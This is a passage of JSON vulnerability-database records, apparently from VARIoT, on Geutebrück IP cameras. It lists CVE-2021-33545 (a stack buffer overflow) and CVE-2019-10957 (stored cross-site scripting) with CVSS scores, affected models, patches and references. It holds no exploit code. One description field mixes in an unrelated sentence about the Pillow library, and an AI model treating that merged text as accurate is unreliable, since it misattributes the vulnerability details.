"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33545",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33545",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33545",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33545",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2092",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-33545",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-33545"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2092"
},
{
"db": "NVD",
"id": "CVE-2021-33545"
},
{
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33545"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33545"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33545",
"trust": 2.6
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2092",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33545",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33545"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2092"
},
{
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"id": "VAR-202109-0598",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T19:32:01.831000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158072"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2092"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.7,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33545"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/121.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33545"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2092"
},
{
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33545"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2092"
},
{
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33545"
},
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2092"
},
{
"date": "2021-09-13T18:15:21.720000",
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33545"
},
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2092"
},
{
"date": "2021-09-27T14:30:38.633000",
"db": "NVD",
"id": "CVE-2021-33545"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2092"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
}
],
"trust": 0.6
}
}
VAR-202001-1488
Vulnerability from variot - Updated: 2024-12-28 22:51Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution within the user’s browser. Geutebruck IP Camera G-Code and G-Cam Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.
Geutebrück G-Cam and G-Code have cross-site scripting vulnerabilities. The vulnerability stems from the lack of proper verification of client data by WEB applications. Attackers can use this vulnerability to execute client code. Geutebruck G-Cam and G-Code are prone to an HTML-injection vulnerability and multiple OS command-injection vulnerabilities. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior G-Cam EBC-21xx version 1.12.0.25 and prior G-Cam EFD-22xx version 1.12.0.25 and prior G-Cam ETHC-22xx version 1.12.0.25 and prior G-Cam EWPC-22xx version 1.12.0.25 and prior
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1488",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-2240",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-code/eec-2400",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ebc-2111",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2230",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/efd-2241",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2240",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ebc-2110",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2249",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2239",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/efd-2250",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam",
"scope": "lte",
"trust": 0.6,
"vendor": "geutebruck",
"version": "\u003c=1.12.0.25"
},
{
"model": "g-code",
"scope": "lte",
"trust": 0.6,
"vendor": "geutebruck",
"version": "\u003c=1.12.0.25"
},
{
"model": "g-code/eec-2xxx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ewpc-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ethc-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/efd-22xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-cam/ebc-21xx",
"scope": "eq",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.25"
},
{
"model": "g-code/eec-2xxx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ewpc-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ethc-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/efd-22xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
},
{
"model": "g-cam/ebc-21xx",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.13.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC., and Davy Douhine from RandoriSec, and Davy Douhine from RandoriSec., and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
}
],
"trust": 0.6
},
"cve": "CVE-2019-10957",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2019-10957",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CNVD-2020-22347",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.7,
"id": "CVE-2019-10957",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.8,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-10957",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-10957",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-10957",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-22347",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-090",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-10957",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"db": "VULMON",
"id": "CVE-2019-10957"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
},
{
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to event configuration to store malicious code on the server, which could later be triggered by a legitimate user resulting in code execution within the user\u2019s browser. Geutebruck IP Camera G-Code and G-Cam Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have cross-site scripting vulnerabilities. The vulnerability stems from the lack of proper verification of client data by WEB applications. Attackers can use this vulnerability to execute client code. Geutebruck G-Cam and G-Code are prone to an HTML-injection vulnerability and multiple OS command-injection vulnerabilities. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10957"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "VULMON",
"id": "CVE-2019-10957"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10957",
"trust": 4.2
},
{
"db": "ICS CERT",
"id": "ICSA-19-155-03",
"trust": 3.4
},
{
"db": "BID",
"id": "108579",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-22347",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201906-090",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-10957",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"db": "VULMON",
"id": "CVE-2019-10957"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
},
{
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"id": "VAR-202001-1488",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
}
],
"trust": 1.5020833375
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
}
]
},
"last_update_date": "2024-12-28T22:51:07.576000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/"
},
{
"title": "Patch for Geutebr\u00fcck G-Cam and G-Code cross-site scripting vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/213551"
},
{
"title": "Multiple Geutebr\u00fcck Fixes for product cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93179"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22347"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-090"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": " Cross-site scripting (CWE-79) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014195"
},
{
"db": "NVD",
"id": "CVE-2019-10957"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
},
{
"trust": 1.6,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10957"
},
{
"trust": 0.9,
